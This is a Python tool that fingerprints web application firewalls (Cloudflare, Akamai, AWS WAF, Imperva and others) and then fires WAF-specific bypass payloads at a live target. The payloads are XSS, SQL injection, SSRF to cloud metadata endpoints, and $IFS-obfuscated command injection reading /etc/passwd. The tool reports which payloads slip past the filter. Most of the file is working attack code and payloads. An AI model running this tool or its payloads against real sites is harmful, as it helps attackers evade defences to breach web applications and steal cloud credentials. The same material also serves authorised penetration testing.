#!/usr/bin/env python3
"""
WAF Detector — Fingerprint WAF/CDN and apply adaptive bypass strategies.

Detects:
  Cloudflare, Akamai, AWS WAF, Imperva/Incapsula, F5 BIG-IP, ModSecurity,
  Sucuri, Barracuda, Fortinet, Citrix NetScaler

Then provides WAF-specific bypass payloads for each vulnerability class.

Usage:
    python3 waf_detector.py --target https://target.com
    python3 waf_detector.py --target https://target.com --test-bypass

    # From other tools:
    from waf_detector import WAFDetector
    waf = WAFDetector()
    result = waf.detect("https://target.com")
    bypasses = waf.get_bypasses(result["waf"], "xss")
"""

import argparse
import json
import os
import re
import sys
import time
from datetime import datetime, timezone
from urllib.parse import urlparse, quote

try:
    import urllib.request
    import urllib.error
except ImportError:
    pass

BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

GREEN = "\033[0;32m"
RED = "\033[0;31m"
YELLOW = "\033[1;33m"
CYAN = "\033[0;36m"
BOLD = "\033[1m"
NC = "\033[0m"


def log(level, msg):
    colors = {"ok": GREEN, "err": RED, "warn": YELLOW, "info": CYAN}
    symbols = {"ok": "+", "err": "-", "warn": "!", "info": "*"}
    print(f"{colors.get(level, '')}{BOLD}[{symbols.get(level, '*')}]{NC} {msg}")


# WAF fingerprint signatures
WAF_SIGNATURES = {
    "cloudflare": {
        "headers": {
            "Server": re.compile(r'cloudflare', re.I),
            "CF-RAY": re.compile(r'.+'),
            "CF-Cache-Status": re.compile(r'.+'),
        },
        "cookies": ["__cfduid", "__cf_bm", "cf_clearance"],
        "body_patterns": [
            re.compile(r'Attention Required.*Cloudflare', re.I),
            re.compile(r'cloudflare-nginx', re.I),
            re.compile(r'ray ID:', re.I),
        ],
        "error_codes": [403, 503, 1020],
    },
    "akamai": {
        "headers": {
            "Server": re.compile(r'AkamaiGHost', re.I),
            "X-Akamai-Transformed": re.compile(r'.+'),
        },
        "cookies": ["akamai_generated", "ak_bmsc", "bm_sv"],
        "body_patterns": [
            re.compile(r'Reference.*#\d+\.\w+\.\w+', re.I),
            re.compile(r'Access Denied.*akamai', re.I),
        ],
    },
    "aws_waf": {
        "headers": {
            "X-AMZ-CF-ID": re.compile(r'.+'),
            "X-AMZ-REQUEST-ID": re.compile(r'.+'),
        },
        "cookies": ["awsalb", "awsalbcors", "AWSALB"],
        "body_patterns": [
            re.compile(r'<TITLE>ERROR: The request could not be satisfied</TITLE>', re.I),
            re.compile(r'Request blocked', re.I),
        ],
    },
    "imperva": {
        "headers": {
            "X-CDN": re.compile(r'Imperva|Incapsula', re.I),
        },
        "cookies": ["incap_ses_", "visid_incap_", "__incap_ses"],
        "body_patterns": [
            re.compile(r'Incapsula incident', re.I),
            re.compile(r'Powered By Incapsula', re.I),
            re.compile(r'Request unsuccessful.*Incapsula', re.I),
        ],
    },
    "f5_bigip": {
        "headers": {
            "Server": re.compile(r'BIG-IP|BigIP', re.I),
            "X-WA-Info": re.compile(r'.+'),
        },
        "cookies": ["BIGipServer", "TS", "f5_cspm"],
        "body_patterns": [
            re.compile(r'The requested URL was rejected', re.I),
        ],
    },
    "modsecurity": {
        "headers": {
            "Server": re.compile(r'mod_security|NOYB', re.I),
        },
        "body_patterns": [
            re.compile(r'ModSecurity', re.I),
            re.compile(r'not acceptable', re.I),
            re.compile(r'This error was generated by Mod_Security', re.I),
        ],
    },
    "sucuri": {
        "headers": {
            "Server": re.compile(r'Sucuri', re.I),
            "X-Sucuri-ID": re.compile(r'.+'),
        },
        "body_patterns": [
            re.compile(r'Access Denied.*Sucuri', re.I),
            re.compile(r'Sucuri WebSite Firewall', re.I),
        ],
    },
    "fortinet": {
        "headers": {},
        "cookies": ["FORTIWAFSID"],
        "body_patterns": [
            re.compile(r'FortiWeb', re.I),
            re.compile(r'.fgd_icon', re.I),
        ],
    },
}

# WAF-specific bypass strategies per vulnerability class
WAF_BYPASSES = {
    "cloudflare": {
        "xss": [
            '<svg/onload=alert`1`>',
            '<img src=x onerror="al\\u0065rt(1)">',
            '"><img src=x onerror=\\u0061lert(1)>',
            '<details open ontoggle=alert(1)>',
            '<math><mtext><table><mglyph><svg><mtext><style><img src=x onerror=alert(1)>',
        ],
        "sqli": [
            "' /*!50000OR*/ 1=1--",
            "' %55NION %53ELECT 1,2,3--",
            "';%0ASELECT%0A1--",
            "' OR '1'='1' /*",
        ],
        "ssrf": [
            "http://0177.0.0.1/",
            "http://2130706433/",
            "http://[::ffff:127.0.0.1]/",
            "http://0x7f000001/",
        ],
        "rce": [
            "$(cat${IFS}/etc/passwd)",
            ";cat$IFS/etc/passwd",
            "`cat${IFS}/etc/passwd`",
        ],
    },
    "akamai": {
        "xss": [
            '"><svg/onload=confirm(1)>',
            '<img src=1 onerror=alert`1`>',
            '"><details/open/ontoggle=alert(1)>',
        ],
        "sqli": [
            "' /*!OR*/ 1=1--",
            "' UNION/**/SELECT 1,2,3--",
            "'+OR+'1'='1",
        ],
        "ssrf": [
            "http://127.1/",
            "http://[::1]/",
            "http://0177.0.0.1/",
        ],
    },
    "aws_waf": {
        "xss": [
            '<img/src="x"/onerror=alert(1)>',
            '<svg onload=alert(1)>',
            'javascript:alert(1)//',
        ],
        "sqli": [
            "' OR/**/1=1--",
            "' UNION SELECT NULL--",
            "';WAITFOR DELAY '0:0:5'--",
        ],
        "ssrf": [
            "http://169.254.169.254.xip.io/",
            "http://[::ffff:a]9fe:a9fe]/",
            "http://metadata.google.internal/",
        ],
    },
    "imperva": {
        "xss": [
            '<img src=x onerror=\\x61lert(1)>',
            '<svg/onload=alert(String.fromCharCode(88,83,83))>',
        ],
        "sqli": [
            "' /*!50000UNION*/ /*!50000SELECT*/ 1--",
            "' OR 1=1#",
        ],
    },
    "generic": {
        "xss": [
            '<svg/onload=alert(1)>',
            '"><img src=x onerror=alert(1)>',
            "javascript:alert(1)",
            '<details open ontoggle=alert(1)>',
        ],
        "sqli": [
            "' OR 1=1--",
            "' UNION SELECT NULL,NULL--",
            "1; WAITFOR DELAY '0:0:5'--",
            "' AND SLEEP(5)--",
        ],
        "ssrf": [
            "http://127.0.0.1/",
            "http://169.254.169.254/",
            "http://[::1]/",
            "http://0x7f000001/",
        ],
        "rce": [
            ";id",
            "$(id)",
            "`id`",
            "| id",
        ],
    },
}


class WAFDetector:
    """Detect WAF/CDN and provide bypass strategies."""

    def __init__(self):
        self.results = {}

    def _make_request(self, url, headers=None, timeout=10):
        """Make HTTP request."""
        try:
            req = urllib.request.Request(url)
            req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0")
            if headers:
                for k, v in headers.items():
                    req.add_header(k, v)

            resp = urllib.request.urlopen(req, timeout=timeout)
            return {
                "status": resp.getcode(),
                "headers": dict(resp.getheaders()),
                "body": resp.read().decode("utf-8", errors="replace")[:5000],
                "cookies": resp.getheader("Set-Cookie", ""),
            }
        except urllib.error.HTTPError as e:
            body = e.read().decode("utf-8", errors="replace")[:5000] if e.fp else ""
            return {
                "status": e.code,
                "headers": dict(e.headers),
                "body": body,
                "cookies": e.headers.get("Set-Cookie", ""),
            }
        except Exception as e:
            return {"status": 0, "headers": {}, "body": str(e), "cookies": ""}

    def detect(self, target_url: str) -> dict:
        """Detect WAF on target.

        Makes 2 requests:
        1. Normal GET (fingerprint from headers/cookies)
        2. Malicious GET with SQLi payload (trigger WAF block page)
        """
        log("info", f"Detecting WAF on {target_url}")

        # Request 1: Normal
        resp_normal = self._make_request(target_url)
        time.sleep(0.5)

        # Request 2: Trigger WAF with known-bad payload
        trigger_url = f"{target_url.rstrip('/')}/?test=<script>alert(1)</script>&id=1'+OR+1=1--"
        resp_triggered = self._make_request(trigger_url)

        detected = []
        scores = {}

        for waf_name, sigs in WAF_SIGNATURES.items():
            score = 0

            # Check response headers
            for header_name, pattern in sigs.get("headers", {}).items():
                for resp in (resp_normal, resp_triggered):
                    for rh_name, rh_val in resp["headers"].items():
                        if rh_name.lower() == header_name.lower() and pattern.search(str(rh_val)):
                            score += 30

            # Check cookies
            for cookie_prefix in sigs.get("cookies", []):
                for resp in (resp_normal, resp_triggered):
                    if cookie_prefix.lower() in resp.get("cookies", "").lower():
                        score += 25

            # Check body patterns (especially on triggered response)
            for pattern in sigs.get("body_patterns", []):
                if pattern.search(resp_triggered.get("body", "")):
                    score += 20
                if pattern.search(resp_normal.get("body", "")):
                    score += 10

            # Check error codes
            if resp_triggered["status"] in sigs.get("error_codes", []):
                score += 15

            if score >= 25:
                detected.append(waf_name)
                scores[waf_name] = score

        # Sort by confidence
        detected.sort(key=lambda w: scores.get(w, 0), reverse=True)

        result = {
            "target": target_url,
            "waf_detected": len(detected) > 0,
            "waf": detected[0] if detected else "none",
            "all_detected": detected,
            "confidence_scores": scores,
            "normal_status": resp_normal["status"],
            "triggered_status": resp_triggered["status"],
            "ts": datetime.now(timezone.utc).isoformat(),
        }

        if detected:
            log("warn", f"WAF detected: {detected[0]} (confidence: {scores[detected[0]]}%)")
            for w in detected[1:]:
                log("info", f"  Also possible: {w} ({scores[w]}%)")
        else:
            # Check for generic WAF indicators
            if resp_triggered["status"] in (403, 406, 429, 503):
                log("warn", f"Possible WAF (generic): got {resp_triggered['status']} on trigger")
                result["waf"] = "generic"
                result["waf_detected"] = True
            else:
                log("ok", "No WAF detected")

        self.results[target_url] = result
        return result

    def get_bypasses(self, waf_name: str, vuln_class: str) -> list:
        """Get WAF-specific bypass payloads.

        Args:
            waf_name: Detected WAF name (or "generic")
            vuln_class: "xss", "sqli", "ssrf", "rce"

        Returns:
            List of bypass payloads to try
        """
        waf_name = waf_name.lower()

        # Get WAF-specific payloads first, then generic as fallback
        payloads = WAF_BYPASSES.get(waf_name, {}).get(vuln_class, [])
        generic = WAF_BYPASSES.get("generic", {}).get(vuln_class, [])

        # Combine: WAF-specific first, then generic (no duplicates)
        all_payloads = list(payloads)
        for p in generic:
            if p not in all_payloads:
                all_payloads.append(p)

        return all_payloads

    def get_evasion_headers(self, waf_name: str) -> dict:
        """Get headers that help evade the detected WAF."""
        evasion = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
        }

        if waf_name == "cloudflare":
            # Cloudflare respects certain headers
            evasion["Cache-Control"] = "no-cache"
        elif waf_name == "akamai":
            evasion["Pragma"] = "akamai-x-cache-on"
        elif waf_name == "imperva":
            # Imperva is sensitive to request rate
            pass

        return evasion

    def test_bypass(self, target_url: str, waf_name: str, vuln_class: str = "xss") -> dict:
        """Test which bypass payloads succeed against the detected WAF."""
        bypasses = self.get_bypasses(waf_name, vuln_class)
        evasion_headers = self.get_evasion_headers(waf_name)

        results = {
            "target": target_url,
            "waf": waf_name,
            "vuln_class": vuln_class,
            "tested": 0,
            "passed": [],
            "blocked": [],
        }

        for payload in bypasses:
            encoded = quote(payload, safe="")
            test_url = f"{target_url.rstrip('/')}/?test={encoded}"

            resp = self._make_request(test_url, headers=evasion_headers)
            results["tested"] += 1

            if resp["status"] in (200, 301, 302):
                results["passed"].append({
                    "payload": payload,
                    "status": resp["status"],
                })
                log("ok", f"Bypass passed: {payload[:50]}... → {resp['status']}")
            else:
                results["blocked"].append({
                    "payload": payload,
                    "status": resp["status"],
                })

            time.sleep(0.5)  # Rate limit to avoid IP ban

        log("info", f"Bypass test: {len(results['passed'])}/{results['tested']} payloads passed WAF")
        return results

    def save_results(self, target_name: str):
        """Save WAF detection results."""
        if not self.results:
            return

        out_dir = os.path.join(BASE_DIR, "recon", target_name)
        os.makedirs(out_dir, exist_ok=True)

        out_file = os.path.join(out_dir, "waf_detection.json")
        with open(out_file, "w") as f:
            json.dump(self.results, f, indent=2)
        log("ok", f"Saved WAF results to {out_file}")


def main():
    parser = argparse.ArgumentParser(description="WAF Detector & Bypass Engine")
    parser.add_argument("--target", required=True, help="Target URL")
    parser.add_argument("--test-bypass", action="store_true", help="Test bypass payloads")
    parser.add_argument("--vuln-class", default="xss", help="Vulnerability class for bypass (xss/sqli/ssrf/rce)")
    parser.add_argument("--save", help="Target name for saving results")
    args = parser.parse_args()

    detector = WAFDetector()
    result = detector.detect(args.target)

    print(json.dumps(result, indent=2))

    if args.test_bypass and result["waf_detected"]:
        bypass_results = detector.test_bypass(args.target, result["waf"], args.vuln_class)
        print(json.dumps(bypass_results, indent=2))

    if args.save:
        detector.save_results(args.save)


if __name__ == "__main__":
    main()
